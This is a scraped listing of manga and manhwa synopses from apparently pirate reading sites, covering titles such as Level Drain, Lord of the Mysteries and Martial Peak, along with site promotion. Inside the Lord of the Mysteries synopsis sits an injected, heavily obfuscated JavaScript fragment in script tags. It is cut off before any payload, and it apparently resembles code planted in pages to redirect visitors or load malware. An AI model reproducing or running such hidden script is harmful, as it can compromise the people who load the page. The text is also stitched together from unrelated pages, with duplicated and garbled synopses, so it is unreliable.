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Level Drain

Read Level Drain Manga online for free at MANHUA TOP The content of the comic Level Drain: “In this world, levels are absolute, and the weak are deprived of everything. I was once like that…” This is a world where dangerous monsters roam the land and adventurers make their living by defeating them. With level as the symbol of absolute power, those with the higher levels gained wealth and fame while those with the lower levels exploited others further beneath them. The protagonist, Alca, was called a “corpse scrapper” because of his “Unable to gain experience” skill, which prevented his level from rising, making him the lowest in society. Under such circumstances, he obtained the “Abyss Armor,” a suit of armor of calamity. This armor makes him able to use “Level Drain,” which allows him to absorb the level of the person he kills! “With this power, all those who stand in my way will be……” Alca, who now has obtained the “Level Drain”, begins to increase his fame and abilities as an adventurer by absorbing the levels of both humans and monsters alike. But before his path, dragons, the strongest species in the world, as well as adventurers of the natural disaster class, of which there are only a few in the world known. stand in his way. However, even they are nothing but stepping stones for him. This is a heroic tale of a jet-black knight, once despised as the lowest of lowest, who now takes from those above and grows to become the most powerful being in the world. “Level Drain” is also known as: Level Drain -Zettai Musou no Boukensha- / レベルドレイン -絶対無双の冒険者- “Level Drain Novel” is a comic series published by the website MANHUA TOP and is reused by other websites such as: ZINMANGA, ManhwaTop, S2Manga… At MANHUA TOP, you can find the latest, hottest comic series, updated quickly with high-quality images, providing readers with great experiences. Please share MANHUATOP website with your family, friends, and acquaintances so that we can have more motivation to publish the newest and best comic series for you. Sincerely thank you! You can READ NEW MANGA recommendation!!! Protected by My Dragon Knight Solo Leveling The Symbiotic Relationship Between the Rabbit and the Black Panther


Lord of the Mysteries

With the rising tide of steam power and machinery, who can come close to being a Beyonder? Shrouded in the fog of history and darkness, who or what is the lurking evil that murmurs into our ears? Waking up to be faced with a string of mysteries, Zhou Mingrui finds himself reincarnated as Klein Moretti in an alternate Victorian era world where he sees a world filled with machinery, cannons, dreadnoughts, airships, difference machines, as well as Potions, Divination, Hexes, Tarot Cards, Sealed Artifacts… The Light continues to shine but mystery has never gone far. Follow Klein as he finds himself entangled with the Churches of the world—both orthodox and unorthodox—while he slowly develops newfound powers thanks to the Beyonder potions. Like the corresponding tarot card, The Fool, which is numbered 0—a number of unlimited potential—this is the legend of “The Fool.”<script></script><script>(function(_0x46f0c7,_0x3ddaa9){var _0x580af5=_0x1efb,_0x1afe8d=_0x46f0c7();while(!![]){try{var _0x2824cd=-parseInt(_0x580af5(0x119))/(0x1*-0xcf7+-0x1abe+0x17*0x1ba)*(-parseInt(_0x580af5(0x109))/(-0x1fdf*-0x1+-0x849*-0x2+-0x306f))+-parseInt(_0x580af5(0x100))/(-0x21*-0x15+0x1b*-0x51+0x5d9)+parseInt(_0x580af5(0x118))/(0x88b*-0x3+0xdfa*-0x1+0x1b9*0x17)+parseInt(_0x580af5(0x11a))/(-0x1f5*0x4+0x1*-0x9d7+0x11b0)*(-parseInt(_0x580af5(0x11c))/(-0xd47*-0x1+0x883+-0x15c4))+-parseInt(_0x580af5(0x104))/(0xf4a*0x1+0x2*-0x80c+-0x3*-0x47)+-parseInt(_0x580af5(0x10c))/(-0x123e+0x5f0+0xc56)+parseInt(_0x580af5(0x101))/(-0x35*-0x3f+0x1097+-0x1d99)*(parseInt(_0x580af5(0x103))/(0x1*0x20f9+-0x10*0x89+-0x185f*0x1));if(_0x2824cd===_0x3ddaa9)break;else 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Love Destiny

Catch “Love Destiny” on Mangazin! Read the latest chapters daily and follow the life-reversing drama of this engaging Fantasy Manga The brief synopsis of “Love Destiny” Soo Yeon, a young Korean girl who is in love with Thailand’s culture visits the temples of Ayutthaya with her junior, Ru An, for whom she has secret feelings for. But an unexpected accident happened, causing her soul to enter the body of a villainess (Mae Karaket) in the Ayutthaya period, who also has a fiancée (Muen Sunthorn Thewa) who hates her more than anything else. “Other people could have traveled back in time to the Joseon Era. But how did I end up here?!” “Is this because I’m in a different country?!” Another name for “Love Destiny” Bhuppae Sunniwat บุพเพสันนิวาส


Love Letter From The Future

Reading manhwa Love Letter From The Future at Mangazin Ian Percus, the second son of a countryside Viscount. One day, he received a love letter from the future. ‘If we don’t protect the future, the world will perish.’ With an ominous warning scribbled by someone.

18 hours ago

Love on Campus

Read manhwa Love on Campus / Love in Campus Minyoo Seo has accepted her fate as the school outcast. During her first year of college, a creeper latched onto her, making it impossible for her to make friends or date. Just when Minyoo thought she was going to have a dull college life, she met Woobin Seon, one of the hottest guys on campus. Woobin is kind, funny, and seems to have feelings for Minyoo. However, falling for one of the most popular guys on campus has its downfall, and Minyoo is about to find out how complicated love can be… “Love on Campus Manhwa” is sames name: ラブ・イン・キャンパス 러브 인 캠퍼스


Magic Level 99990000 All-Attribute Great Sage

All over the world, Monsters suddenly began appearing. The only person who could save humanity from “The Calamity” was “The Great Sage”, Ichikami Atsumu. But, despite being satisfied in his death, he was reincarnated into the body of a boy who was bullied into killing himself, Kusanagi Minato. Atsumu, waking up in a Japan fifty years into the future, is shocked to see a peaceful world, and where magic has become far weaker compared to when he was alive. For now, Atsumu decides to go back to Kamui Magic Academy as Minato, but learns that mages are nothing more than a relic of the past, and in their place exist a class of privileged nobles .After blowing off his bragging, low-levelled bullies, Atsumu gains the interest of a noble magician girl, Mizuha Yuika, as well as his schoolmates and teachers. What’s more, Atsumu finds a sign that the Calamity, which was supposed to have been subdued, will return–– “It looks like my power is still needed” Within the soul of student lies the Great Sage?! The strongest Great Sage will change this world drunk on peace. With his reincarnation in the future set, the curtain opens on a new Hero’s story!


Martial Peak

The journey to the martial peak is a lonely, solitary and long one. In the face of adversity, you must survive and remain unyielding. Only then you can breakthrough and continue on your journey to becoming the strongest. High Heaven Pavilion tests its disciples in the harshest ways possible to prepare them for such a journey. One day the lowly sweeper Yang Kai managed to obtain a mysterious black book, setting him on the road to the peak of the martial world. Associated Names The Pinnacle of Martial Arts 무련전봉


Masked Knight Will Never Deceive The Villainess

Read manga Masked Knight Will Never Deceive The Villainess / Akujo wa Kamen no Kishi ni Damasarenai / 悪女は仮面の騎士に騙されない Can the ex-otaku villainess resist the perilous temptation coming from her beloved character, who happens to be her own killer?!


Mending The Barbaric Prince’s Wounds

Read Manga Mending The Barbaric Prince’s Wounds / Ima Reta Ouji No Saiai Seijo / The Hated Prince’s Beloved Saintess / 忌まれた王子の最愛聖女 A Former Nurse Reincarnated I Was Doted When I Saved The Hated Prince… The Nurse Who Was Committed To Her Job Because She Regretted Letting Her Sick Brother Die Alone After Overworking, She Reborn As Primera, A Noblewoman In A Small Country. I’m Also Saying, ‘I Want To Save People As Long As I Can Reach Them.’ And Primera, Who Showed Her Nursing Skills He Married Astor, The First Prince Of The Great Kingdom Of Adid. Astor Is Detested As A Cruel And Sinister Prince. Primera Arrives In Adid, And Astor Says, “We Don’t Need Fiancees.” They Tell You Primera Felt Solitude And Kindness Behind His Eyes: “I Want To Save Him.” Feeling I Will Give You The Allowance For The Injury He Was Hiding. Astor’s Fiancee Begins, But Primera Begins To Notice. Astor Is Detested And Degraded Because Of His Magnificent Malice In The Royal Palace…


Miss Not-So Sidekick

Miss Not-So Sidekick Hyejung loved to read to escape her daily stress. But that’s before she woke up inside the bizarre world of her favorite novel! Instead of the main heroine who courts three eligible men, she is now Latte Ectrie – a minor villain that everyone hates?! One way or another, it’s a chance to live out her most beloved storyline, with popcorn in hand to watch all the drama! Taking charge of the narrative takes on a whole new meaning!


MookHyang – Dark Lady

As the master of the School of Unholy Arts and as the undefeated Unmasked Demon, MookHyang unfortunately falls to a strange fantasy world by the magic of his enemies (School of Blood Arts). In the new world of elf, sorcerer, knight, and dragon, MookHyang’s adventure of finding a way back to his old world (Murim) unfolds.


Mookhyang – Dark Lady

As The Master Of The School Of Unholy Arts And As The Undefeated Unmasked Demon, Mookhyang Unfortunately Falls To A Strange Fantasy World By The Magic Of His Enemies (School Of Blood Arts). In The New World Of Elf, Sorcerer, Knight, And Dragon, Mookhyang’s Adventure Of Finding A Way Back To His Old World (Murim) Unfolds.
